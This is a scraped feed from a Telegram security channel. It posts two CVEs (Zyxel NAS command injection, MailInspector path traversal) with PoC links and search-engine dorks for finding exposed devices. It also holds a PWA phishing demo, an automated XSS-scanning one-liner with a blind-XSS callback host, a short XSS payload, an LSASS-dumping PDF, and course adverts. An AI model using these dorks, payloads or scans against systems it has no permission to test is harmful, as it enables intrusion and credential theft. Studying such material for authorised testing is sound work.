Brut Security
15.2K subscribers
965 photos
76 videos
292 files
1.01K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
Brut Security pinned Deleted message
Blind SQL Payloads
πŸ”₯7πŸ‘2
Media is too big
VIEW IN TELEGRAM
⚠️CVE-2024-29973: Unauthorized command injection in Zyxel NAS devices⚠️

πŸ”This command injection vulnerability in the β€œsetCookie” parameter in Zyxel NAS326 and NAS542 devices could allow an unauthenticated attacker to execute some OS commands by sending a crafted HTTP POST request.

πŸ“ŒPoC: https://github.com/k3lpi3b4nsh33/CVE-2024-29973

πŸ“£Dorks:
πŸ”½Hunter: product.name="ZyXEL NAS542"||http://product.name="ZyXEL NAS326"
πŸ”ΌFOFA: app="NAS542" || app="ZYXEL-NAS326"
πŸ”½SHODAN: http.title:"Zyxel NAS326"
Please open Telegram to view this post
VIEW IN TELEGRAM
🀯6❀1
This media is not supported in your browser
VIEW IN TELEGRAM
⚠️Progressive Web App (PWA) Phishing⚠️

πŸ“ŒAttack Scenario: A user lands on index.html and clicks the "Install Microsoft Application" button. The install app prompt appears and once it is installed by the user, the JavaScript embedded in index.html redirects the PWA window to the phishing page that hase a fake URL bar at the top (i.e. mrd0x.html). Ensure that you're testing this over HTTPS to avoid encountering issues.

πŸ“£Blog Link: https://mrd0x.com/progressive-web-apps-pwa-phishing

πŸ”—POC: https://github.com/mrd0x/PWA-Phishing

⚠️This is simply to demonstrate how PWA phishing works. Don't use it for illegal purposes.
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯3❀1
Web Cache Deception & Poisoning.pdf
297.3 KB
πŸ”₯2🀯1
cache posioning writeup by ankit.pdf
1.2 MB
πŸ”₯2
πŸ”Ό One-Liner XSS πŸ”½

subfinder -dL domainlist1.txt | dnsx | shuf | (gau | | hakrawler) | anew | egrep -iv "\.(jpg|jpeg|gif|tif|tiff|png|ttf|woff|woff2|php|ico|pdf|svg|txt|js)$" | urless | nilo | dalfox pipe -b https://xss.hunter
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯8πŸ‘1
Brut Security pinned Β«Keep checking my old Posts to continue your learning Process!Β»
Methods for Dump LSASS.pdf
33.4 MB
πŸ’₯Methods for Dump LSASSπŸ’₯
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯2
β˜„οΈKnoXSS XSS Payload - confirm?.(1)
πŸ”Credit- @lu3ky13

#bugbounty #bugbountytips
Please open Telegram to view this post
VIEW IN TELEGRAM
🫑4🀯2
πŸ‘€Top 1% on TryHackMe? That’s CuteπŸ‘€

🀑I've seen a lot of posts lately celebrating being in the top 1% on TryHackMe, but let's take a step back. While it's great to challenge yourself with these platforms, does ranking highly truly reflect practical, real-world experience?

πŸ™‚In the ever-evolving field of cybersecurity, hands-on experience and the ability to adapt to real-world situations are what truly count. Ranking in the top 1% on a practice platform like TryHackMe is commendable, but it shouldn't be confused with actual industry experience.

βœ‰οΈThoughts?
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘6❀‍πŸ”₯5πŸ”₯1
β˜„οΈCVE-2024-34470: An Unauthenticated Path Traversal vulnerability in HSC Mailinspector!

πŸ“£An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An Unauthenticated Path Traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.

🚫PoC: https://lnkd.in/gK4NHJ4C
⛔️Video POC: https://youtube.com/shorts/Ij8nWAZQ978?feature=share

🌐Dorks:
Hunter: web.title=="..:: HSC MailInspector ::.."
FOFA: title=="..:: HSC MailInspector ::.."
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯4❀‍πŸ”₯1πŸ‘1
πŸ’₯ Registration Open for July Batch: Extreme Web Application Penetration Testing πŸ’₯

⚠️Slots Remaining 4

πŸ’―Registration Link:
https://lnkd.in/g7MjfrXG

Join us for an intensive 2-month course designed for beginners with basic IT & cybersecurity knowledge!


πŸ–₯ Starts: July Mid, 2024
ℹ️ Schedule: Mon, Wed, Fri | 12:00 PM - 2:00 PM IST
⏸ Mode: Online | Language: English
πŸ”— Course Module:
https://lnkd.in/gfZbBCFn
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘1
ceh-v12-exam-set.pdf
1.6 MB
β˜„οΈSharpen your skills for the Certified Ethical Hacker v12 exam with these practice questionsβ˜„οΈ
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘1
Subdomain Enumeration Tools UHD.pdf
127.4 KB
Subdomain Enumeration Tools

#bugbounty #bugbountytips
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘6🀑5🀣2🐳1🀝1
πŸ”«Smap - passive Nmap like scanner built with shodan.io

😠Smap is a port scanner built with shodan.io's free API. It takes same command line arguments as Nmap and produces the same output which makes it a drop-in replacament for Nmap.

🀨 Read more: https://github.com/s0md3v/Smap

😐#infosec #cybersecurity #hacking #pentesting #security
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯3❀‍πŸ”₯1
▢️This June Batch Filled with talented Students 🫢

πŸ‘€July Batch Registration is Open
https://wa.me/message/NQLPOBIAEFDBN1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🀯1